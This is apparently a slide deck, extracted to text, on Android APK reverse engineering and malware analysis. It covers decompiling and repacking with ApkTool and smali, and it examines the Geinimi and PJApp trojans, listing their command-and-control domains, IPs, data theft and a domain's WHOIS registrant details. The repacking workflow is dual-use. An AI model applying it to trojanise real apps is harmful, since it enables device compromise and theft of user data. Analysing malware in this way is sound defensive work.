恶恶恶恶 Apk Explorer Series .2 1
1
恶意软件Apk Explorer Series .2
2
恶意软件@Android
3
Nduo
N多做的
ApkApkNduo Apk
4
如何实现
.apk
• Unzip
.dex
• Decompile• ApkTool[1]
• Dex2Jar[2]
.smali
• Modify• Smali[4]
new.apk
• Repack• ApkTool
5
Wet feet
AlertDialog alertDialog = new AlertDialog.Builder(this).create();alertDialog.setTitle("LALALA");alertDialog.setMessage("You should see me!!!!!!!");alertDialog.show();
AlertDialog Java Code
6
Wet feet cont.
new-instance v1, Landroid/app/AlertDialog$Builder;
#v1=(UninitRef);
invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V #v1=(Reference);
invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog; move-result-object v0
.local v0, alertDialog:Landroid/app/AlertDialog; #v0=(Reference);
const-string v1, "LALALA" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
const-string v1, "You should see me!!!!!!!" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
new-instance v1, Landroid/app/AlertDialog$Builder; #v1=(UninitRef); invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V #v1=(Reference); invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog; move-result-object v0
.local v0, alertDialog:Landroid/app/AlertDialog; #v0=(Reference); const-string v1, "LALALA" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V const-string v1, "You should see me!!!!!!!" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
AlertDialog Op-code
7
Wet feet cont..method public onCreate(Landroid/os/Bundle;)V .locals 12 .parameter "savedInstanceState" .prologue const/16 v11, 0x400
Yingyonghui Java code
SplashActivity.java
#v11=(PosShort); const/4 v10, 0x0
#v10=(Null); const/4 v9, 0x1
#v9=(One); invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
AlertDialog Op-code
8
HideFile Java code
HideFiles.java
Wet feet cont.getPackageInfo("com.nduoa.market", 0);
(“使用N多市场, \n帮助维护「%s」的更
新?” , …)
localBuilder2.setPositiveButton("安装 ",
locald);
a.a("http://market.nduoa.com/update/nDuoaMarket.apk", str2);
i.a("KAWAHAeBUBLBaBBAMAPBRAEAIAWAMBdAKBbALAUABBCABBOAABdAQANAeABBaANAaABAOBPBTAGACBOATBDBAB");
9
Geinimi[6]
10
Geinimi cont.
www.widifu.comwww.udaore.com
www.frijd.comwww.islpast.comwww.piajesj.comwww.qoewsl.comwww.weolir.comwww.uisoa.comwww.riusdu.comwww.aiucr.com
117.135.134.185180.168.68.34
Geinimi
Access the user's geo-location based on coordinates given by the GPSSend or receive SMS messagesAccess the user's mailboxRead and modify the user's phonebook contactsRead and modify the user's browsing historyCheck running processes in memoryTerminate legitimate running process in the deviceInstall shortcutsPerform web queriesChange the wallpaper of the device
BoardBrandCPIDCPU ABIDeviceDIDDisplayFingerprintHostLine1 NumberManufacturerModelNetwork Country ISONetwork OperatorNetwork Operator NameNetwork TypePhone TypeProduct
PTIDSALESIDSDK versionShellSIM Country ISOSIM OperatorSIM Operator NameSIM Serial NumberSIM StateSoftware VersionSubscriber IDTagsTimeTypeUserVoice mail Number
11
PJApp 泡椒 [3][5]
"content://browser/bookmarks"
MEEG
O91.C
OM
渠道激活
IMEI / SIM / IMSI / ICCIDPdus……
Default Browser
SEND ALL Bookmarks
ADDandroid.paojiao.cnct2.paojiao.cng3g3.cn
com.uc.browsercom.tencent.mttcom.opera.mini.androidmobi.mgeek.TunnyBrowsercom.skyfire.browsercom.kolbysoft.steelcom.android.browser
12
MEEGO91.COMRegistrant:nduo deminanchang jiangxi sicA501nanchang, jiangxi 444001China
Registered through: GoDaddy.comCreated on: 05-Sep-10Expires on: 05-Sep-11
Administrative Contact:demi, nduo [email protected] jiangxi sicA501nanchang, jiangxi 444001China+86.861363345678
13
Reference1. http://code.google.com/p/android-apktool/2. http://code.google.com/p/dex2jar/3. http://www.itnews.tk/archives/47614. http://code.google.com/p/smali/5. http://globalthreatcenter.com/?cat=186. http://blog.mylookout.com/_media/Geinimi_Trojan
_Teardown.pdf
14
Question ?